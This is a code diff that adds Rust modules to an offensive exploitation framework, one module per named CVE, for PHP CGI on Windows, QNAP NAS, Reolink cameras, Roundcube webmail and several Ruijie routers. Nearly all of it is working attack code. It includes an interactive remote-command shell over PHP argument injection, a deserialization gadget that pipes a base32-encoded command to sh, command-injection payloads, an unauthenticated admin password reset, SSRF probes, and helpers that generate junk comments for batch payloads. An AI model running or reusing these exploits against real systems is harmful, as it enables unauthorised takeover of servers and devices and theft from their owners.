let charset = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ";
let mut rng = rng();
let len = rng.random_range(4..8);
(0..len).map(|_| *charset.choose(&mut rng).unwrap() as char).collect()
}
fn generate_junk_comments() -> String {
let mut rng = rng();
let count = rng.random_range(3..7);
let mut s = String::new();
for _ in 0..count {
writeln!(s, ":: {}", random_string(20)).unwrap();
}
s
}
fn escape_bat_echo(content: &str) -> String {
content.lines().map(|line| {
// Escape special chars for echo
let escaped = line.replace("%", "%%")
.replace("^", "^^")
.replace("&", "^&")
.replace("<", "^<")
.replace(">", "^>")
.replace("|", "^|")
.replace("(", "^(")
.replace(")", "^)");
format!("echo {}", escaped)
}).collect::<Vec<_>>().join("\n")
}
+112
View File
@@ -0,0 +1,112 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::io::Write;
use std::time::Duration;
// use crate::utils::{normalize_target, prompt_yes_no}; // standard utils if available, mimicking other modules
/// PHP CGI Argument Injection (CVE-2024-4577)
/// Exploit for PHP running on Windows via XAMPP or similar setups.
///
/// Credits:
/// - Discovered by Orange Tsai
/// - PoC logic based on watchTowr Labs
const DEFAULT_TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
display_banner();
// Normalize target
let url = if target.starts_with("http://") || target.starts_with("https://") {
target.to_string()
} else {
format!("http://{}", target)
};
let url = url.trim_end_matches('/');
println!("[*] Target: {}", url.cyan());
// Prompt for check or exploit
println!();
println!("{}", "[*] Select operation mode:".cyan());
println!(" 1. Check vulnerability (safe)");
println!(" 2. Execute command (RCE)");
println!();
print!("{}", "Select option [1-2]: ".green());
use std::io::Write;
std::io::stdout().flush()?;
let mut choice = String::new();
std::io::stdin().read_line(&mut choice)?;
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
match choice.trim() {
"1" => check_vuln(&client, url).await?,
"2" => exploit(&client, url).await?,
_ => println!("{}", "[-] Invalid option".red()),
}
Ok(())
}
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ PHP CGI Argument Injection (CVE-2024-4577) ║".cyan());
println!("{}", "║ Target: Windows PHP (XAMPP etc.) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
async fn check_vuln(client: &Client, url: &str) -> Result<()> {
println!("{}", "[*] Checking for vulnerability...".yellow());
// Simple echo check
let exploit_url = format!("{}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", url);
let payload = "<?php echo 'VULNERABLE_CVE_2024_4577'; die; ?>";
let resp = client.post(&exploit_url)
.body(payload)
.send()
.await?;
let text = resp.text().await?;
if text.contains("VULNERABLE_CVE_2024_4577") {
println!("{}", "[+] Target seems VULNERABLE!".green().bold());
Ok(())
} else {
println!("{}", "[-] Target does not appear vulnerable.".red());
Ok(())
}
}
async fn exploit(client: &Client, url: &str) -> Result<()> {
println!("{}", "[*] Entering RCE mode...".yellow());
loop {
print!("{}", "php> ".green().bold());
std::io::stdout().flush()?;
let mut cmd = String::new();
std::io::stdin().read_line(&mut cmd)?;
let cmd = cmd.trim();
if cmd.is_empty() { continue; }
if cmd == "exit" || cmd == "quit" { break; }
let exploit_url = format!("{}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", url);
// We use system() to execute command
let payload = format!("<?php system('{}'); die; ?>", cmd);
match client.post(&exploit_url).body(payload).send().await {
Ok(resp) => {
let text = resp.text().await?;
println!("{}", text);
}
Err(e) => println!("[-] Request failed: {}", e),
}
}
Ok(())
}
+1
View File
@@ -0,0 +1 @@
pub mod cve_2024_4577;
+1
View File
@@ -0,0 +1 @@
pub mod qnap_qts_rce_cve_2024_27130;
@@ -0,0 +1,95 @@
use anyhow::{Result, Context};
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
use urlencoding;
/// QNAP QTS NAS Buffer Overflow RCE (CVE-2024-27130)
///
/// Exploits a stack buffer overflow in the `No_Support_ACL` function via `share.cgi`.
/// Requires a valid `ssid` parameter (obtained from a shared file link).
///
/// Affected: QNAP QTS, QuTScloud, QTS hero
/// Target: /cgi-bin/share.cgi
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_ip = if target.is_empty() {
prompt_required("Target IP/URL")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
let base_url = if target_ip.contains("://") {
target_ip.clone()
} else {
format!("http://{}", target_ip)
};
println!("{} Target: {}", "[*]".blue(), base_url);
// SSID is required - this is the session ID from a share link
let ssid = prompt_required("SSID (from shared file link)")?;
// The payload goes in the 'name' parameter
// For PoC purposes, we'll demonstrate the vulnerability check
// A real exploit would require crafting shellcode for the specific platform
let payload_size = prompt_default("Payload size (for buffer overflow test)", "1024")?;
let size: usize = payload_size.parse().unwrap_or(1024);
println!("{} Sending overflow test payload ({} bytes)...", "[*]".blue(), size);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(15))
.build()?;
// Construct the malicious 'name' parameter
let overflow_payload = "A".repeat(size);
// The vulnerable function is get_file_size which uses strcpy without bounds check
let url = format!(
"{}/cgi-bin/share.cgi?ssid={}&func=get_file_size&name={}",
base_url.trim_end_matches('/'),
urlencoding::encode(&ssid),
urlencoding::encode(&overflow_payload)
);
let res = client.get(&url)
.send()
.await
.context("Failed to send request")?;
let status = res.status();
let text = res.text().await.unwrap_or_default();
if status.is_server_error() || text.is_empty() {
println!("{} Server error or empty response - potential crash!", "[+]".green().bold());
println!("{} The target may be vulnerable to CVE-2024-27130.", "[VULN]".red().bold());
println!("{} For full RCE, craft architecture-specific shellcode.", "[*]".yellow());
} else if status.is_success() {
println!("{} Response received (HTTP {}).", "[*]".blue(), status);
println!("{} Response: {}", "[*]".dimmed(), text.chars().take(200).collect::<String>());
println!("{} Target may have patched the vulnerability or SSID is invalid.", "[*]".yellow());
} else {
println!("{} Unexpected response: HTTP {}", "[-]".red(), status);
}
println!();
println!("{} Note: Full exploitation requires:", "[*]".cyan());
println!(" - Valid SSID from a shared file link");
println!(" - Platform-specific ROP chain or shellcode");
println!(" - QNAP QTS < 5.1.7.2770 / QuTS hero < h5.1.7.2770");
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ QNAP QTS Buffer Overflow RCE (CVE-2024-27130) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
File diff suppressed because it is too large Load Diff
+1
View File
@@ -0,0 +1 @@
pub mod reolink_rce_cve_2019_11001;
@@ -0,0 +1,98 @@
use anyhow::{Result, Context};
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
use urlencoding::encode;
/// Reolink Camera Authenticated Command Injection (CVE-2019-11001)
///
/// Exploits an authenticated OS command injection in the `TestEmail` functionality.
/// Affected Models: RLC-410W, C1 Pro, C2 Pro, RLC-422W, RLC-511W (Firmware <= 1.0.227).
///
/// Parameter: `addr1` in `TestEmail` command.
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_ip = if target.is_empty() {
prompt_required("Target IP")?
} else {
target.to_string()
};
let target_ip = normalize_target(&raw_ip)?;
// Default HTTP/HTTPS?
// Usually HTTP port 80 or HTTPS 443. We will default to HTTP but can try HTTPS if needed.
// Let's assume HTTP validation (can be simple URL).
let base_url = if target_ip.contains("://") {
target_ip.clone()
} else {
format!("http://{}", target_ip)
};
println!("{} Target: {}", "[*]".blue(), base_url);
// Credentials required
let username = prompt_default("Username", "admin")?;
let password = prompt_required("Password")?;
let cmd = prompt_default("Command to execute", "id")?;
println!("{} Sending exploit...", "[*]".blue());
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(15))
.build()?;
// Construct payload
// Command Injection style: test@test.com; <CMD>
let injection = format!("test@test.com; {}", cmd);
// The API requires specific structure. Based on PoC analysis.
// Usually sent as GET or POST. The PoC uses a GET with JSON-like structure in URL or POST body?
// Public docs say: /api.cgi?cmd=TestEmail...
// But Reolink API often takes a JSON body.
// Let's model after the known exploit path:
// Some versions accept it in the JSON body of a POST to /api.cgi
let url = format!("{}/api.cgi?cmd=TestEmail&user={}&password={}", base_url.trim_end_matches('/'), encode(&username), encode(&password));
// The body usually is a JSON array
let body = format!("[{{ \"cmd\": \"TestEmail\", \"action\": 0, \"param\": {{ \"addr1\": \"{}\", \"addr2\": \"test\", \"addr3\": \"test\", \"interval\": 60 }} }}]", injection);
// Some variants use GET but typically these APIs are POST with JSON.
// We will try POST.
let res = client.post(&url)
.header("Content-Type", "application/json")
.body(body)
.send()
.await
.context("Failed to send request")?;
let status = res.status();
let text = res.text().await?;
// If successful, the command output might not be returned (Blind RCE).
// Or it might be returned in the 'value' or error message?
// Usually TestEmail triggers the mail binary.
if status.is_success() {
println!("{} Request sent successfully (HTTP {}).", "[+]".green(), status);
println!("{} Response: {}", "[*]".blue(), text);
println!("{} Note: This RCE is often blind. Check your listener or device behavior.", "[*]".yellow());
} else {
println!("{} Request failed (HTTP {}). check credentials or target.", "[-]".red(), status);
}
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Reolink Camera Authenticated RCE (CVE-2019-11001) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -1,3 +1,26 @@
//! Roundcube Post-Auth RCE Exploit
//!
//! This module exploits a deserialization vulnerability in Roundcube webmail
//! that allows authenticated remote code execution.
//!
//! ## Vulnerability Details
//! - **Affected Versions**: Roundcube 1.1.0 - 1.5.9, 1.6.0 - 1.6.10
//! - **Attack Vector**: Authenticated file upload with serialized PHP payload
//! - **Impact**: Remote Code Execution
//!
//! ## Attack Flow
//! 1. Login with valid credentials
//! 2. Craft malicious PHP serialized payload (Crypt_GPG_Engine gadget)
//! 3. Upload payload via settings file upload
//! 4. Trigger deserialization for code execution
//!
//! ## Security Notes
//! - Uses utils.rs for target validation and prompts
//! - Uses escape_shell_command for safe command encoding
//! - Proper error handling and timeouts
//!
//! For authorized penetration testing only.
use anyhow::{anyhow, Context, Result};
use data_encoding::BASE32_NOPAD;
use md5;
@@ -8,8 +31,21 @@ use reqwest::{Client, cookie::Jar, redirect::Policy};
use std::sync::Arc;
use std::time::{SystemTime, UNIX_EPOCH};
use rand::distr::Alphanumeric;
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
/// // Decode base64 constant for small transparent PNG
use colored::*;
use crate::utils::{
normalize_target, escape_shell_command, prompt_default,
};
/// Display module banner
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Roundcube Post-Auth RCE Exploit ║".cyan());
println!("{}", "║ PHP Deserialization via Crypt_GPG_Engine Gadget ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
/// Decode base64 constant for small transparent PNG
fn transparent_png() -> Vec<u8> {
const PNG_B64: &str = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==";
base64::engine::general_purpose::STANDARD
@@ -17,17 +53,15 @@ fn transparent_png() -> Vec<u8> {
.unwrap_or_default()
}
/// // Build the serialized PHP payload using Crypt_GPG_Engine gadget
/// Build the serialized PHP payload using Crypt_GPG_Engine gadget
fn build_serialized_payload(cmd: &str) -> String {
use crate::utils::escape_shell_command;
// Escape command before encoding to prevent injection
let escaped_cmd = escape_shell_command(cmd);
let encoded = BASE32_NOPAD.encode(escaped_cmd.as_bytes());
let gpgconf = format!("echo \"{}\"|base32 -d|sh &#", encoded);
let len = gpgconf.len();
format!(
"|O:16:\"Crypt_GPG_Engine\":3:{{s:8:\"_process\";b:0;s:8:\"_gpgconf\";s:{}:\"{}\";s:8:\"_homedir\";s:0:\"\";}};",
"|O:16:\"Crypt_GPG_Engine\":3:{{s:8:\"_process\";b:0;s:8:\"_gpgconf\";s:{}:\"{}\";s:8:\"_homedir\";s:0:\"\";}}",
len, gpgconf
)
}
@@ -57,6 +91,28 @@ fn generate_uploadid() -> Result<String> {
Ok(format!("upload{}", millis))
}
/// Validate and normalize target URL
fn validate_target_url(target: &str) -> Result<String> {
let trimmed = target.trim();
// Check if it looks like a URL
if trimmed.starts_with("http://") || trimmed.starts_with("https://") {
// Already has scheme, validate the host part
if let Ok(url) = url::Url::parse(trimmed) {
if let Some(host) = url.host_str() {
// Validate the host using normalize_target
let _ = normalize_target(host)?;
return Ok(trimmed.trim_end_matches('/').to_string());
}
}
return Err(anyhow!("Invalid URL format: {}", trimmed));
}
// No scheme - treat as host:port and add http://
let normalized = normalize_target(trimmed)?;
Ok(format!("http://{}", normalized.trim_end_matches('/')))
}
async fn fetch_login_page(client: &Client, base: &str) -> Result<String> {
let mut url = reqwest::Url::parse(base)?;
url.query_pairs_mut().append_pair("_task", "login");
@@ -105,9 +161,18 @@ async fn login(client: &Client, base: &str, username: &str, password: &str, host
params.push(("_host", host.to_string()));
}
// Manual form construction
let mut body = String::new();
for (key, val) in &params {
if !body.is_empty() { body.push('&'); }
body.push_str(&format!("{}={}", key, urlencoding::encode(val)));
}
let res = client
.post(url)
.form(&params)
.header("Content-Type", "application/x-www-form-urlencoded")
.body(body)
.send()
.await
.map_err(|e| anyhow!("Login request failed: {e}"))?;
@@ -151,19 +216,21 @@ async fn upload_payload(client: &Client, base: &str, filename: &str) -> Result<(
.await
.map_err(|e| anyhow!("Upload request failed: {e}"))?;
println!("[+] Exploit attempt complete. Check your listener or reverse shell.");
println!("{}", "[+] Exploit attempt complete. Check your listener or reverse shell.".green());
Ok(())
}
/// // Entry point for dispatcher
/// Entry point for dispatcher
pub async fn run(target: &str) -> Result<()> {
let mut base_url = target.trim().to_string();
if !base_url.starts_with("http://") && !base_url.starts_with("https://") {
base_url = format!("http://{}", base_url);
}
base_url = base_url.trim_end_matches('/').to_string();
display_banner();
println!("{}", format!("[*] Target: {}", target).yellow());
println!();
// Validate and normalize target URL
let base_url = validate_target_url(target)?;
println!("{}", format!("[*] Validated URL: {}", base_url).cyan());
// // HTTP client with cookies and no redirects
// HTTP client with cookies and no redirects
let jar = Jar::default();
let client = Client::builder()
.cookie_provider(Arc::new(jar))
@@ -175,69 +242,30 @@ pub async fn run(target: &str) -> Result<()> {
if let Some(ver) = check_version(&client, &base_url).await? {
println!("[*] Detected Roundcube version: {}", ver);
if (10100..=10509).contains(&ver) || (10600..=10610).contains(&ver) {
println!("[!] Version appears vulnerable!");
println!("{}", "[!] Version appears vulnerable!".green().bold());
} else {
println!("[-] Version not in known vulnerable range.");
println!("{}", "[-] Version not in known vulnerable range.".yellow());
}
} else {
println!("[?] Could not determine version.");
println!("{}", "[?] Could not determine version.".yellow());
}
let mut username = String::new();
let mut password = String::new();
let mut host = String::new();
let mut command = String::new();
print!("Username: ");
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut username)
.await
.context("Failed to read username")?;
print!("Password: ");
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut password)
.await
.context("Failed to read password")?;
print!("Host parameter (optional): ");
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut host)
.await
.context("Failed to read host")?;
print!("Command to execute: ");
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut command)
.await
.context("Failed to read command")?;
let username = username.trim();
let password = password.trim();
let host = host.trim();
let command = command.trim();
// Use shared prompt utilities for credentials
let username = prompt_default("Username", "")?;
let password = prompt_default("Password", "")?;
let host = prompt_default("Host parameter (optional)", "")?;
let command = prompt_default("Command to execute", "id")?;
if username.is_empty() || password.is_empty() || command.is_empty() {
return Err(anyhow!("Username, password and command must be provided"));
}
login(&client, &base_url, username, password, host).await?;
let serialized = build_serialized_payload(command);
println!("{}", "[*] Attempting login...".cyan());
login(&client, &base_url, &username, &password, &host).await?;
println!("{}", "[+] Login successful!".green());
println!("{}", "[*] Uploading malicious payload...".cyan());
let serialized = build_serialized_payload(&command);
upload_payload(&client, &base_url, &serialized).await
}
+7
View File
@@ -0,0 +1,7 @@
pub mod ruijie_rg_ew_login_bypass_cve_2023_4415;
pub mod ruijie_rg_ew_password_reset_cve_2023_4169;
pub mod ruijie_rsr_router_ci_cve_2024_31616;
pub mod ruijie_auth_bypass_rce_cve_2023_34644;
pub mod ruijie_rg_uac_ci_cve_2024_4508;
pub mod ruijie_rg_ew_update_version_rce_cve_2021_43164;
pub mod ruijie_reyee_ssrf_cve_2024_48874;
@@ -0,0 +1,137 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// Ruijie RG-EW / RG-NBS / RG-S1930 Auth Bypass RCE (CVE-2023-34644)
///
/// Affects: RG-EW series home routers, RG-NBS/RG-S1930 switches,
/// RG-EG business VPN routers, EAP/RAP wireless APs
///
/// Allows remote attackers to gain escalated privileges via crafted
/// POST request to /cgi-bin/luci/api/auth
/// Reference: GitHub Advisory GHSA-xx
const TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_target = if target.is_empty() {
prompt_required("Target IP/URL")?
} else {
target.to_string()
};
let normalized = normalize_target(&raw_target)?;
let base_url = if normalized.contains("://") {
normalized.clone()
} else {
format!("http://{}", normalized)
};
println!("{} Target: {}", "[*]".blue(), base_url);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(TIMEOUT_SECS))
.build()?;
// The vulnerability is in the auth endpoint - allows privilege escalation
let auth_url = format!("{}/cgi-bin/luci/api/auth", base_url.trim_end_matches('/'));
println!("{} Testing auth bypass at {}...", "[*]".blue(), auth_url);
// Crafted payload to bypass authentication
let bypass_payloads = vec![
serde_json::json!({
"method": "login",
"params": {
"username": "admin",
"password": ""
}
}),
serde_json::json!({
"method": "do",
"params": {
"operation": "set",
"data": {"username": "admin"}
}
}),
serde_json::json!({
"method": "exec",
"params": {"cmd": "id"}
}),
];
for (i, payload) in bypass_payloads.iter().enumerate() {
println!("{} Trying payload variant {}...", "[*]".dimmed(), i + 1);
match client.post(&auth_url).json(payload).send().await {
Ok(resp) => {
let status = resp.status();
let text = resp.text().await.unwrap_or_default();
// Look for signs of successful bypass
if text.contains("token") || text.contains("session") ||
text.contains("uid=") || text.contains("\"result\":0") ||
text.contains("admin") && !text.contains("error") {
println!("{} Auth bypass successful!", "[+]".green().bold());
println!("{} Response: {}", "[*]".blue(), &text[..text.len().min(500)]);
println!("{} Device may be VULNERABLE to CVE-2023-34644!", "[VULN]".red().bold());
// Attempt to get a shell command executed
let cmd = prompt_default("Command to execute (or 'skip')", "id")?;
if cmd != "skip" {
attempt_rce(&client, &base_url, &cmd).await;
}
return Ok(());
}
if status.is_success() {
println!("{} HTTP {} - Response: {}", "[*]".yellow(), status, &text[..text.len().min(200)]);
}
},
Err(e) => {
println!("{} Request failed: {}", "[-]".red(), e);
}
}
}
println!();
println!("{} Could not confirm auth bypass.", "[*]".yellow());
println!("{} Target may be patched or different firmware version.", "[*]".cyan());
Ok(())
}
async fn attempt_rce(client: &Client, base_url: &str, cmd: &str) {
println!("{} Attempting RCE...", "[*]".blue());
let rce_endpoints = vec![
format!("{}/cgi-bin/luci/api/cmd", base_url.trim_end_matches('/')),
format!("{}/goform/execCommand", base_url.trim_end_matches('/')),
];
let payload = serde_json::json!({
"method": "exec",
"params": {"cmd": cmd}
});
for endpoint in &rce_endpoints {
if let Ok(resp) = client.post(endpoint).json(&payload).send().await {
let text = resp.text().await.unwrap_or_default();
if !text.is_empty() {
println!("{} RCE Response from {}:", "[*]".blue(), endpoint);
println!("{}", text);
}
}
}
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Ruijie Multi-Product Auth Bypass RCE (CVE-2023-34644) ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,145 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target, prompt_default};
/// Ruijie Reyee Cloud SSRF (CVE-2024-48874)
///
/// Server-Side Request Forgery in Ruijie Reyee devices
/// Allows attackers to access internal services and cloud infrastructure
/// Part of "Open Sesame" vulnerability chain (Claroty Team82)
/// CVSS: High
const TIMEOUT_SECS: u64 = 15;
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_target = if target.is_empty() {
prompt_required("Target IP/URL")?
} else {
target.to_string()
};
let normalized = normalize_target(&raw_target)?;
let base_url = if normalized.contains("://") {
normalized.clone()
} else {
format!("http://{}", normalized)
};
println!("{} Target: {}", "[*]".blue(), base_url);
// SSRF target URL - can be internal service or callback
let ssrf_target = prompt_default(
"SSRF target URL (internal service or callback)",
"http://127.0.0.1:80/"
)?;
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(TIMEOUT_SECS))
.redirect(reqwest::redirect::Policy::none())
.build()?;
println!("{} Testing SSRF vulnerability...", "[*]".blue());
println!("{} SSRF Target: {}", "[*]".cyan(), ssrf_target);
// Various SSRF injection points in Ruijie Reyee devices
let ssrf_endpoints = vec![
// Cloud sync functionality
(format!("{}/api/cloud/sync", base_url.trim_end_matches('/')),
serde_json::json!({"url": ssrf_target, "action": "fetch"})),
// Firmware check
(format!("{}/api/system/checkUpdate", base_url.trim_end_matches('/')),
serde_json::json!({"server": ssrf_target})),
// NTP sync
(format!("{}/api/system/ntp", base_url.trim_end_matches('/')),
serde_json::json!({"server": ssrf_target})),
// Remote management
(format!("{}/cgi-bin/luci/api/remote", base_url.trim_end_matches('/')),
serde_json::json!({"callback_url": ssrf_target})),
// Diagnostic tool
(format!("{}/goform/webcmd", base_url.trim_end_matches('/')),
serde_json::json!({"cmd": "wget", "url": ssrf_target})),
];
for (endpoint, payload) in &ssrf_endpoints {
println!("{} Testing: {}", "[*]".dimmed(), endpoint);
match client.post(endpoint).json(payload).send().await {
Ok(resp) => {
let status = resp.status();
let headers = resp.headers().clone();
let text = resp.text().await.unwrap_or_default();
// Check for SSRF indicators
let mut ssrf_detected = false;
// Response contains data from internal service
if text.contains("<!DOCTYPE") || text.contains("<html") ||
text.contains("Apache") || text.contains("nginx") ||
text.contains("Server:") {
ssrf_detected = true;
println!("{} SSRF response contains external content!", "[+]".green().bold());
}
// Timing-based detection (if request took longer, might be fetching)
if status.is_success() && text.len() > 100 {
ssrf_detected = true;
println!("{} Got substantive response ({} bytes)", "[+]".green(), text.len());
}
// Headers indicating redirect/proxy
if headers.contains_key("x-forwarded-for") ||
headers.contains_key("via") {
println!("{} Proxy headers detected", "[+]".yellow());
}
if ssrf_detected {
println!("{} SSRF DETECTED at {}!", "[VULN]".red().bold(), endpoint);
println!("{} Response preview:", "[*]".blue());
println!("{}", &text[..text.len().min(500)]);
return Ok(());
}
if status.is_success() {
println!("{} HTTP {} - Endpoint accessible", "[*]".yellow(), status);
}
},
Err(e) => {
println!("{} Failed: {}", "[*]".dimmed(), e);
}
}
}
// Test with URL as GET parameter
let get_endpoints = vec![
format!("{}/?url={}", base_url.trim_end_matches('/'), urlencoding::encode(&ssrf_target)),
format!("{}/proxy?target={}", base_url.trim_end_matches('/'), urlencoding::encode(&ssrf_target)),
];
for endpoint in &get_endpoints {
if let Ok(resp) = client.get(endpoint).send().await {
let text = resp.text().await.unwrap_or_default();
if text.len() > 100 && !text.contains("error") && !text.contains("404") {
println!("{} Possible SSRF via GET: {}", "[+]".yellow(), endpoint);
}
}
}
println!();
println!("{} SSRF not confirmed through standard endpoints.", "[*]".yellow());
println!("{} Consider using out-of-band detection (OAST/callback).", "[*]".cyan());
println!("{} Part of 'Open Sesame' chain - requires full exploit chain for RCE.", "[*]".cyan());
Ok(())
}
fn print_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ Ruijie Reyee Cloud SSRF (CVE-2024-48874) ║".cyan());
println!("{}", "║ Part of 'Open Sesame' Vulnerability Chain ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
}
@@ -0,0 +1,55 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::{Duration, SystemTime, UNIX_EPOCH};
/// Ruijie RG-EW1200G Login Bypass (CVE-2023-4415)
/// Bypasses login by sending specific JSON structure to /api/sys/login.
const DEFAULT_TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
display_banner();
let url = if target.starts_with("http") { target.to_string() } else { format!("http://{}", target) };
let url = url.trim_end_matches('/').to_string();
println!("[*] Target: {}", url.cyan());
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
// Exploit Payload
// Timestamp logic from Nuclei template: 1695218596000 (ms)
// We can use current time or static. Code uses current.
let now = SystemTime::now().duration_since(UNIX_EPOCH)?.as_millis();
let payload = serde_json::json!({
"username": "2",
"password": "admin",
"timestamp": now
});
let exploit_url = format!("{}/api/sys/login", url);
println!("[*] Sending exploit to {}...", exploit_url.cyan());
let resp = client.post(&exploit_url)
.json(&payload)
.send()
.await?;
let text = resp.text().await?;
if text.contains(r#""result":"ok""#) { // Nuclei checks for "result":"ok"
println!("{}", "[+] Login Bypass Successful!".green().bold());
println!("[+] Response: {}", text);
} else {
println!("{}", "[-] Exploit failed.".red());
}
Ok(())
}
fn display_banner() {
println!("{}", "Ruijie Login Bypass (CVE-2023-4415)".green().bold());
}
@@ -0,0 +1,56 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
/// Ruijie RG-EW1200G Password Reset (CVE-2023-4169)
/// Vulnerable endpoint /api/sys/set_passwd allows auth bypass to reset admin password.
const DEFAULT_TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
display_banner();
let url = if target.starts_with("http") { target.to_string() } else { format!("http://{}", target) };
let url = url.trim_end_matches('/').to_string();
println!("[*] Target: {}", url.cyan());
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
.build()?;
use std::io::Write;
print!("{}", "Enter new admin password: ".green());
std::io::stdout().flush()?;
let mut new_pass = String::new();
std::io::stdin().read_line(&mut new_pass)?;
let new_pass = new_pass.trim();
let payload = serde_json::json!({
"username": "web",
"admin_new": new_pass
});
let exploit_url = format!("{}/api/sys/set_passwd", url);
println!("[*] Attempting password reset at {}...", exploit_url.cyan());
let resp = client.post(&exploit_url)
.json(&payload)
.send()
.await?;
let text = resp.text().await?;
if text.contains(r#""result":"ok""#) {
println!("{}", "[+] Password Reset Successful!".green().bold());
println!("[+] New password: {}", new_pass);
} else {
println!("{}", "[-] Exploit failed.".red());
}
Ok(())
}
fn display_banner() {
println!("{}", "Ruijie Password Reset (CVE-2023-4169)".green().bold());
}
@@ -0,0 +1,131 @@
use anyhow::Result;
use colored::*;
use reqwest::Client;
use std::time::Duration;
use crate::utils::{prompt_required, normalize_target};
/// Ruijie RG-EW Series updateVersion RCE (CVE-2021-43164)
///
/// Affects: RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55
/// Remote Code Execution via updateVersion function
/// Reference: NIST / Exploit-DB
const TIMEOUT_SECS: u64 = 10;
pub async fn run(target: &str) -> Result<()> {
print_banner();
let raw_target = if target.is_empty() {
prompt_required("Target IP/URL")?
} else {
target.to_string()
};
let normalized = normalize_target(&raw_target)?;
let base_url = if normalized.contains("://") {
normalized.clone()
} else {
format!("http://{}", normalized)
};
println!("{} Target: {}", "[*]".blue(), base_url);
let client = Client::builder()
.danger_accept_invalid_certs(true)
.timeout(Duration::from_secs(TIMEOUT_SECS))
.build()?;
println!("{} Testing updateVersion RCE vulnerability...", "[*]".blue());
// The vulnerability is in the firmware update functionality
// Can inject commands via version check URL parameter
let exploit_endpoints = vec![
(format!("{}/cgi-bin/luci/api/updateVersion", base_url.trim_end_matches('/')), "POST"),
(format!("{}/goform/checkVersion", base_url.trim_end_matches('/')), "POST"),
(format!("{}/api/system/updatefirmware", base_url.trim_end_matches('/')), "POST"),
];
// Payload that attempts command injection via URL parameter
// The vulnerability allows arbitrary URL which can be a command injection vector
let malicious_payloads = vec![
serde_json::json!({
"url": "http://127.0.0.1/`id`",
"version": "1.0.0"
}),
serde_json::json!({
"check_url": ";id;",
"action": "check"
}),
serde_json::json!({
"server": "127.0.0.1$(id)"
}),
];
for (endpoint, method) in &exploit_endpoints {
println!("{} Testing: {} [{}]", "[*]".dimmed(), endpoint, method);
for payload in &malicious_payloads {
let resp = if *method == "POST" {
client.post(endpoint).json(payload).send().await
} else {
client.get(endpoint).send().await
};
match resp {
Ok(r) => {
let status = r.status();
let text = r.text().await.unwrap_or_default();
// Check for command execution signs
if text.contains("uid=") || text.contains("root") ||
text.contains("gid=") {
println!("{} RCE Successful!", "[+]".green().bold());
println!("{} Command output detected:", "[*]".blue());
println!("{}", text);
println!("{} VULNERABLE to CVE-2021-43164!", "[VULN]".red().bold());
return Ok(());
}
// Check for exploitable error messages
if text.contains("wget") || text.contains("curl") ||
text.contains("/bin/") || text.contains("sh:") {
println!("{} Possible command execution detected!", "[+]".yellow());
println!("{} Response: {}", "[*]".blue(), &text[..text.len().min(400)]);
}
if status.is_success() && !text.contains("error") {
